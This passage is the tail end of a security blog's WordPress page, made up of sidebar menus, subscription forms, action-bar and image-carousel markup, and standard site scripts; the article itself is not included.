	<div style="clear: both"></div>


</div>

<div id="sidebar">
<p class="size-small"><a class="feed-image-link" href="https://xorl.wordpress.com/feed/" title="Subscribe to Posts"><img src="https://xorl.wordpress.com/i/rss/blue-small.png?m=1391188133h" alt="RSS Feed" /></a></p>
<form role="search" method="get" id="searchform" class="searchform" action="https://xorl.wordpress.com/">
				<div>
					<label class="screen-reader-text" for="s">Search for:</label>
					<input type="text" value="" name="s" id="s" />
					<input type="submit" id="searchsubmit" value="Search" />
				</div>
			</form><h3>Categories</h3><form action="https://xorl.wordpress.com" method="get"><label class="screen-reader-text" for="cat">Categories</label><select  name='cat' id='cat' class='postform' >
	<option value='-1'>Select Category</option>
	<option class="level-0" value="276">administration&nbsp;&nbsp;(28)</option>
	<option class="level-0" value="641922">android&nbsp;&nbsp;(1)</option>
	<option class="level-0" value="178">books&nbsp;&nbsp;(43)</option>
	<option class="level-0" value="36985">C programming&nbsp;&nbsp;(16)</option>
	<option class="level-0" value="11610518">conferences/trainings&nbsp;&nbsp;(23)</option>
	<option class="level-0" value="78">dell&nbsp;&nbsp;(4)</option>
	<option class="level-0" value="3588">freebsd&nbsp;&nbsp;(24)</option>
	<option class="level-0" value="155998">fujitsu-siemens&nbsp;&nbsp;(1)</option>
	<option class="level-0" value="272">fun&nbsp;&nbsp;(35)</option>
	<option class="level-0" value="15193107">gera&#8217;s insecure programming&nbsp;&nbsp;(5)</option>
	<option class="level-0" value="5784040">grsecurity&nbsp;&nbsp;(20)</option>
	<option class="level-0" value="194943">hax&nbsp;&nbsp;(27)</option>
	<option class="level-0" value="678">history&nbsp;&nbsp;(1)</option>
	<option class="level-0" value="22518">hp&nbsp;&nbsp;(1)</option>
	<option class="level-0" value="32744">ibm&nbsp;&nbsp;(2)</option>
	<option class="level-0" value="610">linux&nbsp;&nbsp;(238)</option>
	<option class="level-0" value="15593">malware&nbsp;&nbsp;(4)</option>
	<option class="level-0" value="23915">mistakes&nbsp;&nbsp;(6)</option>
	<option class="level-0" value="7916579">motorcycles &amp; cars&nbsp;&nbsp;(14)</option>
	<option class="level-0" value="37564">netbsd&nbsp;&nbsp;(9)</option>
	<option class="level-0" value="103">news&nbsp;&nbsp;(37)</option>
	<option class="level-0" value="15262">openbsd&nbsp;&nbsp;(7)</option>
	<option class="level-0" value="321864">opsec&nbsp;&nbsp;(8)</option>
	<option class="level-0" value="1902">osx&nbsp;&nbsp;(2)</option>
	<option class="level-0" value="1008535">pfsense&nbsp;&nbsp;(1)</option>
	<option class="level-0" value="2265970">phrack&nbsp;&nbsp;(3)</option>
	<option class="level-0" value="1811">polls&nbsp;&nbsp;(1)</option>
	<option class="level-0" value="15192692">raptor&#8217;s wargames&nbsp;&nbsp;(2)</option>
	<option class="level-0" value="49333">reverse engineering&nbsp;&nbsp;(11)</option>
	<option class="level-0" value="801">security&nbsp;&nbsp;(43)</option>
	<option class="level-0" value="3589">solaris&nbsp;&nbsp;(19)</option>
	<option class="level-0" value="21182911">threat intelligence&nbsp;&nbsp;(35)</option>
	<option class="level-0" value="1788">tips&nbsp;&nbsp;(7)</option>
	<option class="level-0" value="1">Uncategorized&nbsp;&nbsp;(24)</option>
	<option class="level-0" value="65966">vulnerabilities&nbsp;&nbsp;(446)</option>
	<option class="level-0" value="64947">Wargames&nbsp;&nbsp;(9)</option>
	<option class="level-0" value="800">Windows&nbsp;&nbsp;(10)</option>
</select>
</form>
<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "cat" );
	function onCatChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) {
			dropdown.parentNode.submit();
		}
	}
	dropdown.onchange = onCatChange;
})();
/* ]]> */
</script>

			<h3>Archives</h3>		<label class="screen-reader-text" for="archives-dropdown-2">Archives</label>
		<select id="archives-dropdown-2" name="archive-dropdown">
			
			<option value="">Select Month</option>
				<option value='https://xorl.wordpress.com/2022/07/'> July 2022 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2022/06/'> June 2022 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2022/04/'> April 2022 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2021/12/'> December 2021 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2021/10/'> October 2021 &nbsp;(3)</option>
	<option value='https://xorl.wordpress.com/2021/08/'> August 2021 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2021/07/'> July 2021 &nbsp;(2)</option>
	<option value='https://xorl.wordpress.com/2021/05/'> May 2021 &nbsp;(3)</option>
	<option value='https://xorl.wordpress.com/2021/04/'> April 2021 &nbsp;(10)</option>
	<option value='https://xorl.wordpress.com/2021/03/'> March 2021 &nbsp;(2)</option>
	<option value='https://xorl.wordpress.com/2021/02/'> February 2021 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2021/01/'> January 2021 &nbsp;(4)</option>
	<option value='https://xorl.wordpress.com/2020/08/'> August 2020 &nbsp;(2)</option>
	<option value='https://xorl.wordpress.com/2020/06/'> June 2020 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2020/05/'> May 2020 &nbsp;(2)</option>
	<option value='https://xorl.wordpress.com/2020/03/'> March 2020 &nbsp;(2)</option>
	<option value='https://xorl.wordpress.com/2020/01/'> January 2020 &nbsp;(2)</option>
	<option value='https://xorl.wordpress.com/2019/12/'> December 2019 &nbsp;(6)</option>
	<option value='https://xorl.wordpress.com/2018/07/'> July 2018 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2018/03/'> March 2018 &nbsp;(5)</option>
	<option value='https://xorl.wordpress.com/2018/02/'> February 2018 &nbsp;(8)</option>
	<option value='https://xorl.wordpress.com/2018/01/'> January 2018 &nbsp;(4)</option>
	<option value='https://xorl.wordpress.com/2017/12/'> December 2017 &nbsp;(18)</option>
	<option value='https://xorl.wordpress.com/2017/11/'> November 2017 &nbsp;(38)</option>
	<option value='https://xorl.wordpress.com/2013/05/'> May 2013 &nbsp;(10)</option>
	<option value='https://xorl.wordpress.com/2012/09/'> September 2012 &nbsp;(4)</option>
	<option value='https://xorl.wordpress.com/2012/08/'> August 2012 &nbsp;(3)</option>
	<option value='https://xorl.wordpress.com/2012/06/'> June 2012 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2012/05/'> May 2012 &nbsp;(5)</option>
	<option value='https://xorl.wordpress.com/2012/04/'> April 2012 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2012/02/'> February 2012 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2012/01/'> January 2012 &nbsp;(5)</option>
	<option value='https://xorl.wordpress.com/2011/12/'> December 2011 &nbsp;(5)</option>
	<option value='https://xorl.wordpress.com/2011/10/'> October 2011 &nbsp;(7)</option>
	<option value='https://xorl.wordpress.com/2011/09/'> September 2011 &nbsp;(1)</option>
	<option value='https://xorl.wordpress.com/2011/08/'> August 2011 &nbsp;(10)</option>
	<option value='https://xorl.wordpress.com/2011/07/'> July 2011 &nbsp;(11)</option>
	<option value='https://xorl.wordpress.com/2011/06/'> June 2011 &nbsp;(10)</option>
	<option value='https://xorl.wordpress.com/2011/05/'> May 2011 &nbsp;(22)</option>
	<option value='https://xorl.wordpress.com/2011/04/'> April 2011 &nbsp;(17)</option>
	<option value='https://xorl.wordpress.com/2011/03/'> March 2011 &nbsp;(16)</option>
	<option value='https://xorl.wordpress.com/2011/02/'> February 2011 &nbsp;(8)</option>
	<option value='https://xorl.wordpress.com/2011/01/'> January 2011 &nbsp;(24)</option>
	<option value='https://xorl.wordpress.com/2010/12/'> December 2010 &nbsp;(27)</option>
	<option value='https://xorl.wordpress.com/2010/11/'> November 2010 &nbsp;(29)</option>
	<option value='https://xorl.wordpress.com/2010/10/'> October 2010 &nbsp;(16)</option>
	<option value='https://xorl.wordpress.com/2010/09/'> September 2010 &nbsp;(14)</option>
	<option value='https://xorl.wordpress.com/2010/04/'> April 2010 &nbsp;(5)</option>
	<option value='https://xorl.wordpress.com/2010/02/'> February 2010 &nbsp;(4)</option>
	<option value='https://xorl.wordpress.com/2010/01/'> January 2010 &nbsp;(27)</option>
	<option value='https://xorl.wordpress.com/2009/12/'> December 2009 &nbsp;(9)</option>
	<option value='https://xorl.wordpress.com/2009/11/'> November 2009 &nbsp;(40)</option>
	<option value='https://xorl.wordpress.com/2009/10/'> October 2009 &nbsp;(26)</option>
	<option value='https://xorl.wordpress.com/2009/08/'> August 2009 &nbsp;(24)</option>
	<option value='https://xorl.wordpress.com/2009/07/'> July 2009 &nbsp;(39)</option>
	<option value='https://xorl.wordpress.com/2009/06/'> June 2009 &nbsp;(24)</option>
	<option value='https://xorl.wordpress.com/2009/05/'> May 2009 &nbsp;(38)</option>
	<option value='https://xorl.wordpress.com/2009/04/'> April 2009 &nbsp;(51)</option>
	<option value='https://xorl.wordpress.com/2009/03/'> March 2009 &nbsp;(28)</option>
	<option value='https://xorl.wordpress.com/2009/02/'> February 2009 &nbsp;(24)</option>
	<option value='https://xorl.wordpress.com/2009/01/'> January 2009 &nbsp;(50)</option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-2" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>
			<h3>Pages</h3>
			<ul>
				<li class="page_item page-item-2"><a href="https://xorl.wordpress.com/about/">About</a></li>
<li class="page_item page-item-5068"><a href="https://xorl.wordpress.com/offensive-security-private-companies-inventory/">Offensive Security Private Companies&nbsp;Inventory</a></li>
			</ul>

			<h3><label for="subscribe-field">Follow Blog via Email</label></h3>

			<div class="wp-block-jetpack-subscriptions__container">
			<form
				action="https://subscribe.wordpress.com"
				method="post"
				accept-charset="utf-8"
				id="subscribe-blog"
			>
				<p>Click to follow this blog and receive notifications of new posts by email.</p>
				<p id="subscribe-email">
					<label
						id="subscribe-field-label"
						for="subscribe-field"
						class="screen-reader-text"
					>
						Email Address:					</label>

					<input
							type="email"
							name="email"
							
							style="width: 95%; padding: 1px 10px"
							placeholder="Enter your email address"
							value=""
							id="subscribe-field"
						/>				</p>

				<p id="subscribe-submit"
									>
					<input type="hidden" name="action" value="subscribe"/>
					<input type="hidden" name="blog_id" value="6013855"/>
					<input type="hidden" name="source" value="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/"/>
					<input type="hidden" name="sub-type" value="widget"/>
					<input type="hidden" name="redirect_fragment" value="subscribe-blog"/>
					<input type="hidden" id="_wpnonce" name="_wpnonce" value="4f73ab9a52" />					<button type="submit"
													class="wp-block-button__link"
																	>
						Follow					</button>
				</p>
			</form>
						</div>
			
<h3>APT mappings</h3>
	<ul class='xoxo blogroll'>
<li><a href="https://xorl.wordpress.com/2021/04/20/chinese-cyber-operations-groups/">China</a></li>
<li><a href="https://xorl.wordpress.com/2021/04/24/north-korea-dprk-cyber-operations-groups/">DPRK (North Korea)</a></li>
<li><a href="https://xorl.wordpress.com/2021/04/28/eu-cyber-operations-groups/">EU</a></li>
<li><a href="https://xorl.wordpress.com/2021/05/06/iran-cyber-operations-groups/">Iran</a></li>
<li><a href="https://xorl.wordpress.com/2021/04/16/russias-cyber-operations-groups/">Russia</a></li>
<li><a href="https://xorl.wordpress.com/2021/04/18/us-cyber-operations-groups/">USA</a></li>

	</ul>

<h3>Links</h3>
	<ul class='xoxo blogroll'>
<li><a href="http://www.awarenetwork.org/" title="rattle and iqlord (and legion recently) :)">.aware</a></li>
<li><a href="http://www.attackingthecore.com/" title="Website of the amazing kernel exploitation book :)">Attacking the Core</a></li>
<li><a href="http://dividead.wordpress.com/" title="the amazing dividead.">dividead’s blog</a></li>
<li><a href="http://grsecurity.net/" title="spender&#8217;s awesome patch">grsecurity</a></li>
<li><a href="http://sock-raw.org/" rel="noopener" title="Low level network programming and more" target="_top">ithilgore&#039;s site</a></li>
<li><a href="http://amnezia.2f30.org/" title="coding 24/7">sin&#039;s blog</a></li>
<li><a href="http://c-skills.blogspot.com/" title="you should already know him, no need for a description">stealth&#039;s blog</a></li>

	</ul>



</div>

</div>

<div id="footer">
	<p><a href="https://wordpress.com/?ref=footer_blog" rel="nofollow">Blog at WordPress.com.</a> </p>
</div>
<!--  -->
<script type="text/javascript">
	window._tkq = window._tkq || [];
	if ( Math.random() < 0.01 ) {
		window._tkq.push( [
			'recordEvent',
			'wpcom_wordads_noad',
			{"theme":"pub\/journalist","blog_id":6013855,"post_id":5412,"reason_noadverts_plugin":1,"reason_upgrade":1,"reason_blog_safe":1,"reason_post_null":1}
		] );
	}
</script>	<div style="display:none">
	</div>
<script id='highlander-comments-js-extra'>
var HighlanderComments = {"loggingInText":"Logging In\u2026","submittingText":"Posting Comment\u2026","postCommentText":"Post Comment","connectingToText":"Connecting to %s","commentingAsText":"%1$s: You are commenting using your %2$s account.","logoutText":"Log Out","loginText":"Log In","connectURL":"https:\/\/xorl.wordpress.com\/public.api\/connect\/?action=request","logoutURL":"https:\/\/xorl.wordpress.com\/wp-login.php?action=logout&_wpnonce=a575faac8f","homeURL":"https:\/\/xorl.wordpress.com\/","postID":"5412","gravDefault":"blank","enterACommentError":"Please enter a comment","enterEmailError":"Please enter your email address here","invalidEmailError":"Invalid email address","enterAuthorError":"Please enter your name here","gravatarFromEmail":"This picture will show whenever you leave a comment. Click to customize it.","logInToExternalAccount":"Log in to use details from one of these accounts.","change":"Change","changeAccount":"Change Account","comment_registration":"","userIsLoggedIn":"","isJetpack":"","text_direction":"ltr"};
</script>
<script crossorigin='anonymous' type='text/javascript' src='https://s2.wp.com/_static/??/wp-content/js/textarea-autosize.min.js,/wp-content/mu-plugins/highlander-comments/script.js?m=1660744406j'></script>
	<div id="actionbar" style="display: none;"
			class="actnbr-pub-journalist actnbr-has-follow">
		<ul>
								<li class="actnbr-btn actnbr-hidden">
								<a class="actnbr-action actnbr-actn-follow " href="">
			<svg class="gridicon gridicons-reader-follow" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 16v2h-3v3h-2v-3h-3v-2h3v-3h2v3h3zM20 2v9h-4v3h-3v4H4c-1.1 0-2-.9-2-2V2h18zM8 13v-1H4v1h4zm3-3H4v1h7v-1zm0-2H4v1h7V8zm7-4H4v2h14V4z"/></g></svg><span>Follow</span>
		</a>
		<a class="actnbr-action actnbr-actn-following  no-display" href="">
			<svg class="gridicon gridicons-reader-following" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 13.482L15.508 21 12 17.4l1.412-1.388 2.106 2.188 6.094-6.094L23 13.482zm-7.455 1.862L20 10.89V2H2v14c0 1.1.9 2 2 2h4.538l4.913-4.832 2.095 2.176zM8 13H4v-1h4v1zm3-2H4v-1h7v1zm0-2H4V8h7v1zm7-3H4V4h14v2z"/></g></svg><span>Following</span>
		</a>
							<div class="actnbr-popover tip tip-top-left actnbr-notice" id="follow-bubble">
							<div class="tip-arrow"></div>
							<div class="tip-inner actnbr-follow-bubble">
															<ul>
											<li class="actnbr-sitename">
			<a href="https://xorl.wordpress.com">
				<img alt='' src='https://s2.wp.com/i/logo/wpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' />				xorl %eax, %eax			</a>
		</li>
										<form method="post" action="https://subscribe.wordpress.com" accept-charset="utf-8" style="display: none;">
																						<div class="actnbr-follow-count">Join 135 other followers</div>
																					<div>
										<input type="email" name="email" placeholder="Enter your email address" class="actnbr-email-field" aria-label="Enter your email address" />
										</div>
										<input type="hidden" name="action" value="subscribe" />
										<input type="hidden" name="blog_id" value="6013855" />
										<input type="hidden" name="source" value="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/" />
										<input type="hidden" name="sub-type" value="actionbar-follow" />
										<input type="hidden" id="_wpnonce" name="_wpnonce" value="4f73ab9a52" />										<div class="actnbr-button-wrap">
											<button type="submit" value="Sign me up">
												Sign me up											</button>
										</div>
									</form>
									<li class="actnbr-login-nudge">
										<div>
											Already have a WordPress.com account? <a href="https://wordpress.com/log-in?redirect_to=https%3A%2F%2Fxorl.wordpress.com%2F2022%2F06%2F22%2Fthe-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group%2F&#038;signup_flow=account">Log in now.</a>										</div>
									</li>
								</ul>
															</div>
						</div>
					</li>
							<li class="actnbr-ellipsis actnbr-hidden">
				<svg class="gridicon gridicons-ellipsis" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M7 12c0 1.104-.896 2-2 2s-2-.896-2-2 .896-2 2-2 2 .896 2 2zm12-2c-1.104 0-2 .896-2 2s.896 2 2 2 2-.896 2-2-.896-2-2-2zm-7 0c-1.104 0-2 .896-2 2s.896 2 2 2 2-.896 2-2-.896-2-2-2z"/></g></svg>				<div class="actnbr-popover tip tip-top-left actnbr-more">
					<div class="tip-arrow"></div>
					<div class="tip-inner">
						<ul>
									<li class="actnbr-sitename">
			<a href="https://xorl.wordpress.com">
				<img alt='' src='https://s2.wp.com/i/logo/wpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' />				xorl %eax, %eax			</a>
		</li>
								<li class="actnbr-folded-customize">
								<a href="https://xorl.wordpress.com/wp-admin/customize.php?url=https%3A%2F%2Fxorl.wordpress.com%2F2022%2F06%2F22%2Fthe-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group%2F">
									<svg class="gridicon gridicons-customize" height="20" width="20" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M2 6c0-1.505.78-3.08 2-4 0 .845.69 2 2 2 1.657 0 3 1.343 3 3 0 .386-.08.752-.212 1.09.74.594 1.476 1.19 2.19 1.81L8.9 11.98c-.62-.716-1.214-1.454-1.807-2.192C6.753 9.92 6.387 10 6 10c-2.21 0-4-1.79-4-4zm12.152 6.848l1.34-1.34c.607.304 1.283.492 2.008.492 2.485 0 4.5-2.015 4.5-4.5 0-.725-.188-1.4-.493-2.007L18 9l-2-2 3.507-3.507C18.9 3.188 18.225 3 17.5 3 15.015 3 13 5.015 13 7.5c0 .725.188 1.4.493 2.007L3 20l2 2 6.848-6.848c1.885 1.928 3.874 3.753 5.977 5.45l1.425 1.148 1.5-1.5-1.15-1.425c-1.695-2.103-3.52-4.092-5.448-5.977z"/></g></svg>									<span>Customize</span>
								</a>
							</li>
																<li class="actnbr-folded-follow">
												<a class="actnbr-action actnbr-actn-follow " href="">
			<svg class="gridicon gridicons-reader-follow" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 16v2h-3v3h-2v-3h-3v-2h3v-3h2v3h3zM20 2v9h-4v3h-3v4H4c-1.1 0-2-.9-2-2V2h18zM8 13v-1H4v1h4zm3-3H4v1h7v-1zm0-2H4v1h7V8zm7-4H4v2h14V4z"/></g></svg><span>Follow</span>
		</a>
		<a class="actnbr-action actnbr-actn-following  no-display" href="">
			<svg class="gridicon gridicons-reader-following" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 13.482L15.508 21 12 17.4l1.412-1.388 2.106 2.188 6.094-6.094L23 13.482zm-7.455 1.862L20 10.89V2H2v14c0 1.1.9 2 2 2h4.538l4.913-4.832 2.095 2.176zM8 13H4v-1h4v1zm3-2H4v-1h7v1zm0-2H4V8h7v1zm7-3H4V4h14v2z"/></g></svg><span>Following</span>
		</a>
										</li>
																	<li class="actnbr-signup"><a href="https://wordpress.com/start/">Sign up</a></li>
									<li class="actnbr-login"><a href="https://wordpress.com/log-in?redirect_to=https%3A%2F%2Fxorl.wordpress.com%2F2022%2F06%2F22%2Fthe-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group%2F&#038;signup_flow=account">Log in</a></li>
																	<li class="actnbr-shortlink"><a href="https://wp.me/ppetF-1pi">Copy shortlink</a></li>
																	<li class="flb-report"><a href="http://en.wordpress.com/abuse/">Report this content</a></li>
																	<li class="actnbr-reader">
										<a href="https://wordpress.com/read/blogs/6013855/posts/5412">
											View post in Reader										</a>
									</li>
																	<li class="actnbr-subs">
										<a href="https://subscribe.wordpress.com/">Manage subscriptions</a>
									</li>
																		<li class="actnbr-fold"><a href="">Collapse this bar</a></li>
															</ul>
					</div>
				</div>
			</li>
		</ul>
	</div>
	
<script>
window.addEventListener( "load", function( event ) {
	var link = document.createElement( "link" );
	link.href = "https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.css?v=20210915";
	link.type = "text/css";
	link.rel = "stylesheet";
	document.head.appendChild( link );

	var script = document.createElement( "script" );
	script.src = "https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.js?v=20220329";
	script.defer = true;
	document.body.appendChild( script );
} );
</script>

			<div id="jp-carousel-loading-overlay">
			<div id="jp-carousel-loading-wrapper">
				<span id="jp-carousel-library-loading">&nbsp;</span>
			</div>
		</div>
		<div class="jp-carousel-overlay" style="display: none;">

		<div class="jp-carousel-container">
			<!-- The Carousel Swiper -->
			<div
				class="jp-carousel-wrap swiper-container jp-carousel-swiper-container jp-carousel-transitions"
				itemscope
				itemtype="https://schema.org/ImageGallery">
				<div class="jp-carousel swiper-wrapper"></div>
				<div class="jp-swiper-button-prev swiper-button-prev">
					<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
						<mask id="maskPrev" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="9" height="12">
							<path d="M16.2072 16.59L11.6496 12L16.2072 7.41L14.8041 6L8.8335 12L14.8041 18L16.2072 16.59Z" fill="white"/>
						</mask>
						<g mask="url(#maskPrev)">
							<rect x="0.579102" width="23.8823" height="24" fill="#FFFFFF"/>
						</g>
					</svg>
				</div>
				<div class="jp-swiper-button-next swiper-button-next">
					<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
						<mask id="maskNext" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="8" height="12">
							<path d="M8.59814 16.59L13.1557 12L8.59814 7.41L10.0012 6L15.9718 12L10.0012 18L8.59814 16.59Z" fill="white"/>
						</mask>
						<g mask="url(#maskNext)">
							<rect x="0.34375" width="23.8822" height="24" fill="#FFFFFF"/>
						</g>
					</svg>
				</div>
			</div>
			<!-- The main close buton -->
			<div class="jp-carousel-close-hint">
				<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<mask id="maskClose" mask-type="alpha" maskUnits="userSpaceOnUse" x="5" y="5" width="15" height="14">
						<path d="M19.3166 6.41L17.9135 5L12.3509 10.59L6.78834 5L5.38525 6.41L10.9478 12L5.38525 17.59L6.78834 19L12.3509 13.41L17.9135 19L19.3166 17.59L13.754 12L19.3166 6.41Z" fill="white"/>
					</mask>
					<g mask="url(#maskClose)">
						<rect x="0.409668" width="23.8823" height="24" fill="#FFFFFF"/>
					</g>
				</svg>
			</div>
			<!-- Image info, comments and meta -->
			<div class="jp-carousel-info">
				<div class="jp-carousel-info-footer">
					<div class="jp-carousel-pagination-container">
						<div class="jp-swiper-pagination swiper-pagination"></div>
						<div class="jp-carousel-pagination"></div>
					</div>
					<div class="jp-carousel-photo-title-container">
						<h2 class="jp-carousel-photo-caption"></h2>
					</div>
					<div class="jp-carousel-photo-icons-container">
						<a href="#" class="jp-carousel-icon-btn jp-carousel-icon-info" aria-label="Toggle photo metadata visibility">
							<span class="jp-carousel-icon">
								<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<mask id="maskInfo" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20">
										<path fill-rule="evenodd" clip-rule="evenodd" d="M12.7537 2C7.26076 2 2.80273 6.48 2.80273 12C2.80273 17.52 7.26076 22 12.7537 22C18.2466 22 22.7046 17.52 22.7046 12C22.7046 6.48 18.2466 2 12.7537 2ZM11.7586 7V9H13.7488V7H11.7586ZM11.7586 11V17H13.7488V11H11.7586ZM4.79292 12C4.79292 16.41 8.36531 20 12.7537 20C17.142 20 20.7144 16.41 20.7144 12C20.7144 7.59 17.142 4 12.7537 4C8.36531 4 4.79292 7.59 4.79292 12Z" fill="white"/>
									</mask>
									<g mask="url(#maskInfo)">
										<rect x="0.8125" width="23.8823" height="24" fill="#FFFFFF"/>
									</g>
								</svg>
							</span>
						</a>
												<a href="#" class="jp-carousel-icon-btn jp-carousel-icon-comments" aria-label="Toggle photo comments visibility">
							<span class="jp-carousel-icon">
								<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<mask id="maskComments" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20">
										<path fill-rule="evenodd" clip-rule="evenodd" d="M4.3271 2H20.2486C21.3432 2 22.2388 2.9 22.2388 4V16C22.2388 17.1 21.3432 18 20.2486 18H6.31729L2.33691 22V4C2.33691 2.9 3.2325 2 4.3271 2ZM6.31729 16H20.2486V4H4.3271V18L6.31729 16Z" fill="white"/>
									</mask>
									<g mask="url(#maskComments)">
										<rect x="0.34668" width="23.8823" height="24" fill="#FFFFFF"/>
									</g>
								</svg>

								<span class="jp-carousel-has-comments-indicator" aria-label="This image has comments."></span>
							</span>
						</a>
											</div>
				</div>
				<div class="jp-carousel-info-extra">
					<div class="jp-carousel-info-content-wrapper">
						<div class="jp-carousel-photo-title-container">
							<h2 class="jp-carousel-photo-title"></h2>
						</div>
						<div class="jp-carousel-comments-wrapper">
															<div id="jp-carousel-comments-loading">
									<span>Loading Comments...</span>
								</div>
								<div class="jp-carousel-comments"></div>
								<div id="jp-carousel-comment-form-container">
									<span id="jp-carousel-comment-form-spinner">&nbsp;</span>
									<div id="jp-carousel-comment-post-results"></div>
																														<form id="jp-carousel-comment-form">
												<label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
												<textarea
													name="comment"
													class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea"
													id="jp-carousel-comment-form-comment-field"
													placeholder="Write a Comment..."
												></textarea>
												<div id="jp-carousel-comment-form-submit-and-info-wrapper">
													<div id="jp-carousel-comment-form-commenting-as">
																													<fieldset>
																<label for="jp-carousel-comment-form-email-field">Email (Required)</label>
																<input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field" />
															</fieldset>
															<fieldset>
																<label for="jp-carousel-comment-form-author-field">Name (Required)</label>
																<input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field" />
															</fieldset>
															<fieldset>
																<label for="jp-carousel-comment-form-url-field">Website</label>
																<input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field" />
															</fieldset>
																											</div>
													<input
														type="submit"
														name="submit"
														class="jp-carousel-comment-form-button"
														id="jp-carousel-comment-form-button-submit"
														value="Post Comment" />
												</div>
											</form>
																											</div>
													</div>
						<div class="jp-carousel-image-meta">
							<div class="jp-carousel-title-and-caption">
								<div class="jp-carousel-photo-info">
									<h3 class="jp-carousel-caption" itemprop="caption description"></h3>
								</div>

								<div class="jp-carousel-photo-description"></div>
							</div>
							<ul class="jp-carousel-image-exif" style="display: none;"></ul>
							<a class="jp-carousel-image-download" target="_blank" style="display: none;">
								<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="3" y="3" width="19" height="18">
										<path fill-rule="evenodd" clip-rule="evenodd" d="M5.84615 5V19H19.7775V12H21.7677V19C21.7677 20.1 20.8721 21 19.7775 21H5.84615C4.74159 21 3.85596 20.1 3.85596 19V5C3.85596 3.9 4.74159 3 5.84615 3H12.8118V5H5.84615ZM14.802 5V3H21.7677V10H19.7775V6.41L9.99569 16.24L8.59261 14.83L18.3744 5H14.802Z" fill="white"/>
									</mask>
									<g mask="url(#mask0)">
										<rect x="0.870605" width="23.8823" height="24" fill="#FFFFFF"/>
									</g>
								</svg>
								<span class="jp-carousel-download-text"></span>
							</a>
							<div class="jp-carousel-image-map" style="display: none;"></div>
						</div>
					</div>
				</div>
			</div>
		</div>

		</div>
		
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/xorl.wordpress.com\/2022\/06\/22\/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group\/":5412};
	</script>
				<script crossorigin='anonymous' type='text/javascript' src='https://s2.wp.com/_static/??-eJzTLy/QTc7PK0nNK9EvyClNz8wr1i+uzCtJrMjITM/IAeKS1CJMEWP94uSizIISoOIM5/yiVL2sYh19yo1yKioFEonFGUDz7HNtDU3NDYwMTCwtTLMA0I5ABA=='></script>
<script type='text/javascript'>
	(function(){
		var corecss = document.createElement('link');
		var themecss = document.createElement('link');
		var corecssurl = "https://s1.wp.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver=3.0.9b";
		if ( corecss.setAttribute ) {
				corecss.setAttribute( "rel", "stylesheet" );
				corecss.setAttribute( "type", "text/css" );
				corecss.setAttribute( "href", corecssurl );
		} else {
				corecss.rel = "stylesheet";
				corecss.href = corecssurl;
		}
		document.head.appendChild( corecss );
		var themecssurl = "https://s2.wp.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?m=1363304414h&amp;ver=3.0.9b";
		if ( themecss.setAttribute ) {
				themecss.setAttribute( "rel", "stylesheet" );
